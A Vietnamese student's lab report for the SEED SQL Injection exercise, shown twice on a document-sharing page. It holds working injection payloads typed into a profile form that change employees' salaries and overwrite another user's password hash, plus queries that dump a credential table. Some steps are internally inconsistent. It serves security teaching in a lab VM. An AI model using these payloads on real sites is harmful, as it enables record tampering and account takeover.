Lab 5. SQL Injection | Báo cáo thực hành Môn An toàn thông tin Trường đại học sư phạm kỹ thuật TP. Hồ Chí Minh

SQL injection is a code injection technique that exploits the vulnerabilities in the interface between web applications and database servers. The vulnerability is present when user’s inputs are not correctly checked within the web applications before being sent to the back-end database servers; Submission: You will compose a lab report that documents each step you take, including screenshots to illustrate the effects of commands you type, and describing your observations. Tài liệu giúp bạn tham khảo, ôn tập và đạt kết quả cao. Mời bạn đọc đón xem!

19 10 lượt tải Tải xuống
Chia sẻ Báo cáo tài liệu

Môn: An toàn thông tin (INSE330380)

Trường: Đại học Sư phạm Kỹ thuật Thành phố Hồ Chí Minh

Thông tin:

12 trang 2 tuần trước

Tác giả:

Profile Lê Kim Dung
TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUÂT TP.HỒ CH MINH
KHOA CÔNG NGHỆ THÔNG TIN




BÁO CÁO BÀI THỰC HÀNH(LAB)
Môn học: AN TOÀN THÔNG TIN
Mã lớp học phần: INSE330380_22_1_07
GVHD:TS. Huỳnh Nguyên Chính
Sinh viên thực hiện: Mai Bảo Huy - 20110649
TP Hồ Chí Minh, tháng 09 năm 2022
Lab 5. SQL Injection
SQL injection is a code injection technique that exploits the vulnerabilities in the interface between web
applications and database servers. The vulnerability is present when user’s inputs are not correctly
checked within the web applications before being sent to the back-end database servers
Submission:
You will compose a lab report that documents each step you take, including screenshots to illustrate the
effects of commands you type, and describing your observations. Simply attaching code without any
explanation will not receive credits
Prepare:
- Pre-built Ubuntu VM (download from the SEED Website)
LAB GUIDE:
1. Review the lab environment
#vi /etc/host
# /etc/ apache2/sites-available/ 000-default.conf
2. Get Familiar with SQL Statements
.
mysql> show databases;
Sau đó dùng lệnh
After running the commands above, you need to use a SQL command to print all the profile
information of the employee Alice. Please provide the screenshot of your results
mysql> describe credential;
Mysql> select EID, Nam, Salary, Password from credential;
3. SQL Injection Attack on SELECT Statement
We will use the login page from www.SEEDLabSQLInjection.com for this task
Truy cập vào web seedlabsqlinjection.com
Sau đó chọn Edit ProFile
', salary=90000 where Name ='Alice';#
Chọn Save, ta thấy lương Alice đã được chỉnh sửa.
Tiếp theo ta sẽ thay đổi lương của Body
Sau đó chọn Edit ProFile
', salary=90000 where Name =Boby;#
Ta thấy lương của Boby đã trở thành 1 dolar
Tiếp theo ta sẽ thay đổi mật khẩu của Body
Dùng terminator để mã hóa mật khẩu theo sha1
$ echo -n 'abcxyz' | openssl sha1
Ta có mật khẩu sau đã được mã hóa:
0e3bbd26f46012ccec4776d171f314a00c022d98
Tiếp đó
Sau đó chọn Login
Tiếp đó chọn Edit ProFile
', password='0e3bbd26f46012ccec4776d171f314a00c022d98' where Name='Boby' ; #
Sau đó nhấn Save
Sau đó trở lại terminal và gõ lệnh
mysql> select Name, password from credential;
Sau đó ta đăng nhập với user Name là Alice và password abcxyz
Đã đăng nhập thành công
| 1/12
| | Tải xuống

Có thể bạn quan tâm:

Preview text:

TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUÂT TP.HỒ CH MINH
KHOA CÔNG NGHỆ THÔNG TIN 
BÁO CÁO BÀI THỰC HÀNH(LAB)
Môn học: AN TOÀN THÔNG TIN
Mã lớp học phần: INSE330380_22_1_07
GVHD:TS. Huỳnh Nguyên Chính
Sinh viên thực hiện: Mai Bảo Huy - 20110649
TP Hồ Chí Minh, tháng 09 năm 2022
Lab 5. SQL Injection
SQL injection is a code injection technique that exploits the vulnerabilities in the interface between web
applications and database servers. The vulnerability is present when user’s inputs are not correctly
checked within the web applications before being sent to the back-end database servers Submission:
You will compose a lab report that documents each step you take, including screenshots to illustrate the
effects of commands you type, and describing your observations. Simply attaching code without any
explanation will not receive credits Prepare: -
Pre-built Ubuntu VM (download from the SEED Website) LAB GUIDE: 1. Review the lab environment #vi /etc/host
# /etc/ apache2/sites-available/ 000-default.conf
2. Get Familiar with SQL Statements . mysql> show databases; Sau đó dùng lệnh
After running the commands above, you need to use a SQL command to print all the profile
information of the employee Alice. Please provide the screenshot of your results
mysql> describe credential;
Mysql> select EID, Nam, Salary, Password from credential;
3. SQL Injection Attack on SELECT Statement
We will use the login page from www.SEEDLabSQLInjection.com for this task
Truy cập vào web seedlabsqlinjection.com Sau đó chọn Edit ProFile
', salary=90000 where Name ='Alice';#
Chọn Save, ta thấy lương Alice đã được chỉnh sửa.
Tiếp theo ta sẽ thay đổi lương của Body Sau đó chọn Edit ProFile
', salary=90000 where Name =Boby;#
Ta thấy lương của Boby đã trở thành 1 dolar
Tiếp theo ta sẽ thay đổi mật khẩu của Body
Dùng terminator để mã hóa mật khẩu theo sha1
$ echo -n 'abcxyz' | openssl sha1
Ta có mật khẩu sau đã được mã hóa:
0e3bbd26f46012ccec4776d171f314a00c022d98 Tiếp đó Sau đó chọn Login
Tiếp đó chọn Edit ProFile
', password='0e3bbd26f46012ccec4776d171f314a00c022d98' where Name='Boby' ; # Sau đó nhấn Save
Sau đó trở lại terminal và gõ lệnh
mysql> select Name, password from credential;
Sau đó ta đăng nhập với user Name là Alice và password abcxyz
Đã đăng nhập thành công